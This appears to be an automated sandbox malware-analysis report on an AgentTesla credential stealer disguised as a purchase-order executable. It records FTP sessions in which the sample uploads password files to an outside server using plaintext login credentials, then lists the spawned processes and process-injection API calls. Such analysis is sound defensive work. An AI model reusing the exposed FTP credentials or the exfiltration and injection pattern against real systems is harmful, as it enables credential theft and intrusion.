                                            Oct 1, 2024 07:31:33.680572987 CEST21497065.2.84.236192.168.2.8226-File successfully transferred
                                            226-File successfully transferred226 0.221 seconds (measured here), 1.42 Kbytes per second
                                            Oct 1, 2024 07:31:46.627922058 CEST21497125.2.84.236192.168.2.8220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 08:31. Server port: 21.
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 08:31. Server port: 21.220-This is a private system - No anonymous login
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 08:31. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 08:31. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.
                                            Oct 1, 2024 07:31:46.645164967 CEST4971221192.168.2.85.2.84.236USER fgghv@alternatifplastik.com
                                            Oct 1, 2024 07:31:46.868467093 CEST21497125.2.84.236192.168.2.8331 User fgghv@alternatifplastik.com OK. Password required
                                            Oct 1, 2024 07:31:46.868599892 CEST4971221192.168.2.85.2.84.236PASS Fineboy777@
                                            Oct 1, 2024 07:31:47.117877960 CEST21497125.2.84.236192.168.2.8230 OK. Current restricted directory is /
                                            Oct 1, 2024 07:31:47.341084957 CEST21497125.2.84.236192.168.2.8504 Unknown command
                                            Oct 1, 2024 07:31:47.341229916 CEST4971221192.168.2.85.2.84.236PWD
                                            Oct 1, 2024 07:31:47.564277887 CEST21497125.2.84.236192.168.2.8257 "/" is your current location
                                            Oct 1, 2024 07:31:47.564481974 CEST4971221192.168.2.85.2.84.236TYPE I
                                            Oct 1, 2024 07:31:47.787836075 CEST21497125.2.84.236192.168.2.8200 TYPE is now 8-bit binary
                                            Oct 1, 2024 07:31:47.788686037 CEST4971221192.168.2.85.2.84.236PASV
                                            Oct 1, 2024 07:31:48.011962891 CEST21497125.2.84.236192.168.2.8227 Entering Passive Mode (5,2,84,236,240,72)
                                            Oct 1, 2024 07:31:48.017800093 CEST4971221192.168.2.85.2.84.236STOR PW_user-841675_2024_10_01_01_31_44.html
                                            Oct 1, 2024 07:31:48.641787052 CEST21497125.2.84.236192.168.2.8150 Accepted data connection
                                            Oct 1, 2024 07:31:48.866142035 CEST21497125.2.84.236192.168.2.8226-File successfully transferred
                                            226-File successfully transferred226 0.224 seconds (measured here), 1.39 Kbytes per second
                                            Oct 1, 2024 07:31:54.746680975 CEST21497155.2.84.236192.168.2.8220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 08:31. Server port: 21.
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 08:31. Server port: 21.220-This is a private system - No anonymous login
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 08:31. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 08:31. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.
                                            Oct 1, 2024 07:31:54.750654936 CEST4971521192.168.2.85.2.84.236USER fgghv@alternatifplastik.com
                                            Oct 1, 2024 07:31:54.970118046 CEST21497155.2.84.236192.168.2.8331 User fgghv@alternatifplastik.com OK. Password required
                                            Oct 1, 2024 07:31:54.972088099 CEST4971521192.168.2.85.2.84.236PASS Fineboy777@
                                            Oct 1, 2024 07:31:55.214142084 CEST21497155.2.84.236192.168.2.8230 OK. Current restricted directory is /
                                            Oct 1, 2024 07:31:55.433476925 CEST21497155.2.84.236192.168.2.8504 Unknown command
                                            Oct 1, 2024 07:31:55.433727980 CEST4971521192.168.2.85.2.84.236PWD
                                            Oct 1, 2024 07:31:55.653544903 CEST21497155.2.84.236192.168.2.8257 "/" is your current location
                                            Oct 1, 2024 07:31:55.653718948 CEST4971521192.168.2.85.2.84.236TYPE I
                                            Oct 1, 2024 07:31:55.873261929 CEST21497155.2.84.236192.168.2.8200 TYPE is now 8-bit binary
                                            Oct 1, 2024 07:31:55.873579979 CEST4971521192.168.2.85.2.84.236PASV
                                            Oct 1, 2024 07:31:56.092916012 CEST21497155.2.84.236192.168.2.8227 Entering Passive Mode (5,2,84,236,252,210)
                                            Oct 1, 2024 07:31:56.098704100 CEST4971521192.168.2.85.2.84.236STOR PW_user-841675_2024_10_01_01_31_52.html
                                            Oct 1, 2024 07:31:56.715498924 CEST21497155.2.84.236192.168.2.8150 Accepted data connection
                                            Oct 1, 2024 07:31:56.936228991 CEST21497155.2.84.236192.168.2.8226-File successfully transferred
                                            226-File successfully transferred226 0.221 seconds (measured here), 1.42 Kbytes per second

                                            Click to jump to process

                                            Click to jump to process

                                            Click to dive into process behavior distribution

                                            Click to jump to process

                                            Target ID:0
                                            Start time:01:31:23
                                            Start date:01/10/2024
                                            Path:C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe"
                                            Imagebase:0x520000
                                            File size:537'600 bytes
                                            MD5 hash:0FD28ED18E522B9EEF69B57AA8BDBF8F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1472676483.00000000028F8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1479691061.0000000003A03000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1479691061.0000000003A03000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1485671738.0000000005D40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1472676483.0000000002C6C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1472676483.0000000002C6C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1479691061.0000000003AAE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1479691061.0000000003AAE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1479691061.0000000003AAE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Target ID:2
                                            Start time:01:31:27
                                            Start date:01/10/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                            Imagebase:0x3a0000
                                            File size:42'064 bytes
                                            MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1623982738.0000000000772000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.1623982738.0000000000772000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.1629857451.00000000028CE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1629857451.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.1629857451.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:6
                                            Start time:01:31:40
                                            Start date:01/10/2024
                                            Path:C:\Users\user\AppData\Roaming\Xpnzea.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Roaming\Xpnzea.exe"
                                            Imagebase:0x880000
                                            File size:537'600 bytes
                                            MD5 hash:0FD28ED18E522B9EEF69B57AA8BDBF8F
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1652064396.0000000003D1F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.1652064396.0000000003D1F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000006.00000002.1652064396.0000000004583000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000006.00000002.1627992334.0000000002C98000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1627992334.00000000030FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.1627992334.00000000030FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1652064396.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.1652064396.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 47%, ReversingLabs
                                            • Detection: 33%, Virustotal, Browse
                                            Reputation:low
                                            Has exited:true

                                            Target ID:7
                                            Start time:01:31:43
                                            Start date:01/10/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                            Imagebase:0x5a0000
                                            File size:42'064 bytes
                                            MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.1709180379.0000000002801000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.1709180379.0000000002801000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.1709180379.000000000284F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:8
                                            Start time:01:31:48
                                            Start date:01/10/2024
                                            Path:C:\Users\user\AppData\Roaming\Xpnzea.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Roaming\Xpnzea.exe"
                                            Imagebase:0x2e0000
                                            File size:537'600 bytes
                                            MD5 hash:0FD28ED18E522B9EEF69B57AA8BDBF8F
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000008.00000002.1708492205.00000000028F7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000008.00000002.1739735884.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1739735884.0000000003A2A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1739735884.0000000003A2A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1708492205.0000000002B9C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1708492205.0000000002B9C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Target ID:9
                                            Start time:01:31:51
                                            Start date:01/10/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                            Imagebase:0x660000
                                            File size:42'064 bytes
                                            MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2691701821.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2691701821.00000000029FC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2691701821.00000000029FC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:moderate
                                            Has exited:false

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:10%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:6.3%
                                              Total number of Nodes:378
                                              Total number of Limit Nodes:37
                                              execution_graph 60183 5e2af20 60184 5e2af35 60183->60184 60191 5e2af60 60184->60191 60195 5e2b28d 60184->60195 60199 5e2b4bd 60184->60199 60203 5e2b245 60184->60203 60207 5e2af51 60184->60207 60185 5e2af4b 60193 5e2af8a 60191->60193 60192 5e2b27f 60192->60185 60193->60192 60211 5e2c388 60193->60211 60197 5e2afb7 60195->60197 60196 5e2b27f 60196->60185 60197->60196 60198 5e2c388 10 API calls 60197->60198 60198->60197 60201 5e2afb7 60199->60201 60200 5e2b27f 60200->60185 60201->60200 60202 5e2c388 10 API calls 60201->60202 60202->60201 60205 5e2afb7 60203->60205 60204 5e2b27f 60204->60185 60205->60204 60206 5e2c388 10 API calls 60205->60206 60206->60205 60209 5e2af60 60207->60209 60208 5e2b27f 60208->60185 60209->60208 60210 5e2c388 10 API calls 60209->60210 60210->60209 60212 5e2c3ad 60211->60212 60216 5e2c4cb 60212->60216 60222 5e2c468 60212->60222 60217 5e2c4e8 60216->60217 60228 5e2cb68 60217->60228 60260 5e2cba9 60217->60260 60293 5e2cb58 60217->60293 60218 5e2c44d 60223 5e2c4cf 60222->60223 60224 5e2c44d 60222->60224 60225 5e2cb68 10 API calls 60223->60225 60226 5e2cb58 10 API calls 60223->60226 60227 5e2cba9 10 API calls 60223->60227 60225->60224 60226->60224 60227->60224 60229 5e2cb7d 60228->60229 60325 5e2d9a2 60229->60325 60333 5e2d7dd 60229->60333 60338 5e2cd19 60229->60338 60343 5e2da18 60229->60343 60348 5e2d258 60229->60348 60356 5e2d61b 60229->60356 60361 5e2d81a 60229->60361 60365 5e2cd57 60229->60365 60370 5e2cf11 60229->60370 60378 5e2d890 60229->60378 60383 5e2d053 60229->60383 60391 5e2cece 60229->60391 60396 5e2cd8e 60229->60396 60401 5e2d1c4 60229->60401 60406 5e2d501 60229->60406 60411 5e2ccbd 60229->60411 60416 5e2d33f 60229->60416 60424 5e2d0b5 60229->60424 60429 5e2cff7 60229->60429 60434 5e2cd70 60229->60434 60442 5e2d4af 60229->60442 60447 5e2d5af 60229->60447 60455 5e2d5a9 60229->60455 60460 5e2d76b 60229->60460 60465 5e2d3ea 60229->60465 60470 5e2d165 60229->60470 60475 5e2d723 60229->60475 60480 5e2cde3 60229->60480 60485 5e2ce62 60229->60485 60261 5e2cbb6 60260->60261 60262 5e2cb7f 60260->60262 60264 5e2d9a2 4 API calls 60262->60264 60265 5e2ce62 2 API calls 60262->60265 60266 5e2cde3 2 API calls 60262->60266 60267 5e2d723 2 API calls 60262->60267 60268 5e2d165 2 API calls 60262->60268 60269 5e2d3ea 2 API calls 60262->60269 60270 5e2d76b 2 API calls 60262->60270 60271 5e2d5a9 2 API calls 60262->60271 60272 5e2d5af 4 API calls 60262->60272 60273 5e2d4af 2 API calls 60262->60273 60274 5e2cd70 4 API calls 60262->60274 60275 5e2cff7 2 API calls 60262->60275 60276 5e2d0b5 2 API calls 60262->60276 60277 5e2d33f 4 API calls 60262->60277 60278 5e2ccbd 2 API calls 60262->60278 60279 5e2d501 2 API calls 60262->60279 60280 5e2d1c4 2 API calls 60262->60280 60281 5e2cd8e 2 API calls 60262->60281 60282 5e2cece 2 API calls 60262->60282 60283 5e2d053 4 API calls 60262->60283 60284 5e2d890 2 API calls 60262->60284 60285 5e2cf11 2 API calls 60262->60285 60286 5e2cd57 2 API calls 60262->60286 60287 5e2d81a 2 API calls 60262->60287 60288 5e2d61b 2 API calls 60262->60288 60289 5e2d258 4 API calls 60262->60289 60290 5e2da18 2 API calls 60262->60290 60291 5e2cd19 2 API calls 60262->60291 60292 5e2d7dd 2 API calls 60262->60292 60263 5e2cb9f 60263->60218 60264->60263 60265->60263 60266->60263 60267->60263 60268->60263 60269->60263 60270->60263 60271->60263 60272->60263 60273->60263 60274->60263 60275->60263 60276->60263 60277->60263 60278->60263 60279->60263 60280->60263 60281->60263 60282->60263 60283->60263 60284->60263 60285->60263 60286->60263 60287->60263 60288->60263 60289->60263 60290->60263 60291->60263 60292->60263 60294 5e2cb68 60293->60294 60296 5e2d9a2 4 API calls 60294->60296 60297 5e2ce62 2 API calls 60294->60297 60298 5e2cde3 2 API calls 60294->60298 60299 5e2d723 2 API calls 60294->60299 60300 5e2d165 2 API calls 60294->60300 60301 5e2d3ea 2 API calls 60294->60301 60302 5e2d76b 2 API calls 60294->60302 60303 5e2d5a9 2 API calls 60294->60303 60304 5e2d5af 4 API calls 60294->60304 60305 5e2d4af 2 API calls 60294->60305 60306 5e2cd70 4 API calls 60294->60306 60307 5e2cff7 2 API calls 60294->60307 60308 5e2d0b5 2 API calls 60294->60308 60309 5e2d33f 4 API calls 60294->60309 60310 5e2ccbd 2 API calls 60294->60310 60311 5e2d501 2 API calls 60294->60311 60312 5e2d1c4 2 API calls 60294->60312 60313 5e2cd8e 2 API calls 60294->60313 60314 5e2cece 2 API calls 60294->60314 60315 5e2d053 4 API calls 60294->60315 60316 5e2d890 2 API calls 60294->60316 60317 5e2cf11 2 API calls 60294->60317 60318 5e2cd57 2 API calls 60294->60318 60319 5e2d81a 2 API calls 60294->60319 60320 5e2d61b 2 API calls 60294->60320 60321 5e2d258 4 API calls 60294->60321 60322 5e2da18 2 API calls 60294->60322 60323 5e2cd19 2 API calls 60294->60323 60324 5e2d7dd 2 API calls 60294->60324 60295 5e2cb9f 60295->60218 60296->60295 60297->60295 60298->60295 60299->60295 60300->60295 60301->60295 60302->60295 60303->60295 60304->60295 60305->60295 60306->60295 60307->60295 60308->60295 60309->60295 60310->60295 60311->60295 60312->60295 60313->60295 60314->60295 60315->60295 60316->60295 60317->60295 60318->60295 60319->60295 60320->60295 60321->60295 60322->60295 60323->60295 60324->60295 60326 5e2d365 60325->60326 60328 5e2ccbb 60325->60328 60490 5e211c1 60326->60490 60494 5e211c8 60326->60494 60327 5e2cc2a 60328->60327 60498 5e20fb0 60328->60498 60502 5e20fa8 60328->60502 60335 5e2ccbb 60333->60335 60334 5e2cc2a 60335->60334 60336 5e20fb0 WriteProcessMemory 60335->60336 60337 5e20fa8 WriteProcessMemory 60335->60337 60336->60335 60337->60335 60339 5e2ccbb 60338->60339 60340 5e2cc2a 60339->60340 60341 5e20fb0 WriteProcessMemory 60339->60341 60342 5e20fa8 WriteProcessMemory 60339->60342 60341->60339 60342->60339 60344 5e2ccbb 60343->60344 60345 5e2cc2a 60344->60345 60346 5e20fb0 WriteProcessMemory 60344->60346 60347 5e20fa8 WriteProcessMemory 60344->60347 60346->60344 60347->60344 60349 5e2dc8d 60348->60349 60350 5e2ccbb 60348->60350 60506 5e2f708 60349->60506 60511 5e2f6f8 60349->60511 60351 5e2cc2a 60350->60351 60354 5e20fb0 WriteProcessMemory 60350->60354 60355 5e20fa8 WriteProcessMemory 60350->60355 60354->60350 60355->60350 60358 5e2ccbb 60356->60358 60357 5e2cc2a 60358->60357 60359 5e20fb0 WriteProcessMemory 60358->60359 60360 5e20fa8 WriteProcessMemory 60358->60360 60359->60358 60360->60358 60524 5e2f8d1 60361->60524 60529 5e2f8d8 60361->60529 60362 5e2d832 60367 5e2ccbb 60365->60367 60366 5e2cc2a 60367->60366 60368 5e20fb0 WriteProcessMemory 60367->60368 60369 5e20fa8 WriteProcessMemory 60367->60369 60368->60367 60369->60367 60371 5e2cf2d 60370->60371 60374 5e20fb0 WriteProcessMemory 60371->60374 60375 5e20fa8 WriteProcessMemory 60371->60375 60372 5e2ccbb 60373 5e2cb9f 60372->60373 60376 5e20fb0 WriteProcessMemory 60372->60376 60377 5e20fa8 WriteProcessMemory 60372->60377 60373->60218 60374->60372 60375->60372 60376->60372 60377->60372 60379 5e2ccbb 60378->60379 60380 5e2cc2a 60379->60380 60381 5e20fb0 WriteProcessMemory 60379->60381 60382 5e20fa8 WriteProcessMemory 60379->60382 60381->60379 60382->60379 60384 5e2d5b4 60383->60384 60386 5e2ccbb 60383->60386 60534 5e2f7a0 60384->60534 60539 5e2f791 60384->60539 60385 5e2cc2a 60386->60385 60387 5e20fb0 WriteProcessMemory 60386->60387 60388 5e20fa8 WriteProcessMemory 60386->60388 60387->60386 60388->60386 60393 5e2ccbb 60391->60393 60392 5e2cc2a 60393->60392 60394 5e20fb0 WriteProcessMemory 60393->60394 60395 5e20fa8 WriteProcessMemory 60393->60395 60394->60393 60395->60393 60398 5e2ccbb 60396->60398 60397 5e2cc2a 60398->60396 60398->60397 60399 5e20fb0 WriteProcessMemory 60398->60399 60400 5e20fa8 WriteProcessMemory 60398->60400 60399->60398 60400->60398 60403 5e2ccbb 60401->60403 60402 5e2cc2a 60403->60402 60404 5e20fb0 WriteProcessMemory 60403->60404 60405 5e20fa8 WriteProcessMemory 60403->60405 60404->60403 60405->60403 60408 5e2ccbb 60406->60408 60407 5e2cc2a 60408->60407 60409 5e20fb0 WriteProcessMemory 60408->60409 60410 5e20fa8 WriteProcessMemory 60408->60410 60409->60408 60410->60408 60412 5e2ccbb 60411->60412 60412->60411 60413 5e2cc2a 60412->60413 60414 5e20fb0 WriteProcessMemory 60412->60414 60415 5e20fa8 WriteProcessMemory 60412->60415 60414->60412 60415->60412 60417 5e2d349 60416->60417 60420 5e211c1 NtResumeThread 60417->60420 60421 5e211c8 NtResumeThread 60417->60421 60418 5e2cc2a 60419 5e2ccbb 60419->60418 60422 5e20fb0 WriteProcessMemory 60419->60422 60423 5e20fa8 WriteProcessMemory 60419->60423 60420->60419 60421->60419 60422->60419 60423->60419 60426 5e2ccbb 60424->60426 60425 5e2cc2a 60426->60425 60427 5e20fb0 WriteProcessMemory 60426->60427 60428 5e20fa8 WriteProcessMemory 60426->60428 60427->60426 60428->60426 60431 5e2ccbb 60429->60431 60430 5e2cc2a 60431->60430 60432 5e20fb0 WriteProcessMemory 60431->60432 60433 5e20fa8 WriteProcessMemory 60431->60433 60432->60431 60433->60431 60435 5e2ccbb 60434->60435 60437 5e2db46 60434->60437 60436 5e2cc2a 60435->60436 60438 5e20fb0 WriteProcessMemory 60435->60438 60439 5e20fa8 WriteProcessMemory 60435->60439 60440 5e2f7a0 2 API calls 60437->60440 60441 5e2f791 2 API calls 60437->60441 60438->60435 60439->60435 60440->60435 60441->60435 60444 5e2ccbb 60442->60444 60443 5e2cc2a 60444->60443 60445 5e20fb0 WriteProcessMemory 60444->60445 60446 5e20fa8 WriteProcessMemory 60444->60446 60445->60444 60446->60444 60448 5e2db6c 60447->60448 60453 5e2f7a0 2 API calls 60448->60453 60454 5e2f791 2 API calls 60448->60454 60449 5e2cc2a 60450 5e2ccbb 60450->60449 60451 5e20fb0 WriteProcessMemory 60450->60451 60452 5e20fa8 WriteProcessMemory 60450->60452 60451->60450 60452->60450 60453->60450 60454->60450 60457 5e2ccbb 60455->60457 60456 5e2cc2a 60457->60456 60458 5e20fb0 WriteProcessMemory 60457->60458 60459 5e20fa8 WriteProcessMemory 60457->60459 60458->60457 60459->60457 60462 5e2ccbb 60460->60462 60461 5e2cc2a 60462->60461 60463 5e20fb0 WriteProcessMemory 60462->60463 60464 5e20fa8 WriteProcessMemory 60462->60464 60463->60462 60464->60462 60467 5e2ccbb 60465->60467 60466 5e2cc2a 60467->60466 60468 5e20fb0 WriteProcessMemory 60467->60468 60469 5e20fa8 WriteProcessMemory 60467->60469 60468->60467 60469->60467 60472 5e2ccbb 60470->60472 60471 5e2cc2a 60472->60471 60473 5e20fb0 WriteProcessMemory 60472->60473 60474 5e20fa8 WriteProcessMemory 60472->60474 60473->60472 60474->60472 60477 5e2ccbb 60475->60477 60476 5e2cc2a 60477->60476 60478 5e20fb0 WriteProcessMemory 60477->60478 60479 5e20fa8 WriteProcessMemory 60477->60479 60478->60477 60479->60477 60481 5e2cdfb 60480->60481 60552 5e2e160 60481->60552 60557 5e2e150 60481->60557 60482 5e2ce13 60487 5e2ccbb 60485->60487 60486 5e2cc2a 60487->60486 60488 5e20fb0 WriteProcessMemory 60487->60488 60489 5e20fa8 WriteProcessMemory 60487->60489 60488->60487 60489->60487 60491 5e211c4 NtResumeThread 60490->60491 60493 5e21268 60491->60493 60493->60328 60495 5e211c9 NtResumeThread 60494->60495 60497 5e21268 60495->60497 60497->60328 60499 5e20fb1 WriteProcessMemory 60498->60499 60501 5e21095 60499->60501 60501->60328 60503 5e20fac WriteProcessMemory 60502->60503 60505 5e21095 60503->60505 60505->60328 60507 5e2f71d 60506->60507 60516 5e208f0 60507->60516 60520 5e208e9 60507->60520 60508 5e2f736 60508->60350 60512 5e2f708 60511->60512 60514 5e208f0 Wow64SetThreadContext 60512->60514 60515 5e208e9 Wow64SetThreadContext 60512->60515 60513 5e2f736 60513->60350 60514->60513 60515->60513 60517 5e20939 Wow64SetThreadContext 60516->60517 60519 5e209b1 60517->60519 60519->60508 60521 5e208f0 Wow64SetThreadContext 60520->60521 60523 5e209b1 60521->60523 60523->60508 60525 5e2f8d8 60524->60525 60527 5e208f0 Wow64SetThreadContext 60525->60527 60528 5e208e9 Wow64SetThreadContext 60525->60528 60526 5e2f906 60526->60362 60527->60526 60528->60526 60530 5e2f8ed 60529->60530 60532 5e208f0 Wow64SetThreadContext 60530->60532 60533 5e208e9 Wow64SetThreadContext 60530->60533 60531 5e2f906 60531->60362 60532->60531 60533->60531 60535 5e2f7b5 60534->60535 60544 5e20e50 60535->60544 60548 5e20e48 60535->60548 60536 5e2f7d7 60536->60385 60540 5e2f79a 60539->60540 60542 5e20e50 VirtualAllocEx 60540->60542 60543 5e20e48 VirtualAllocEx 60540->60543 60541 5e2f7d7 60541->60385 60542->60541 60543->60541 60545 5e20e94 VirtualAllocEx 60544->60545 60547 5e20f0c 60545->60547 60547->60536 60549 5e20e50 VirtualAllocEx 60548->60549 60551 5e20f0c 60549->60551 60551->60536 60553 5e2e177 60552->60553 60554 5e2e199 60553->60554 60562 5e2e4d2 60553->60562 60567 5e2e547 60553->60567 60554->60482 60558 5e2e177 60557->60558 60559 5e2e4d2 2 API calls 60558->60559 60560 5e2e547 2 API calls 60558->60560 60561 5e2e199 60558->60561 60559->60561 60560->60561 60561->60482 60563 5e2e4e0 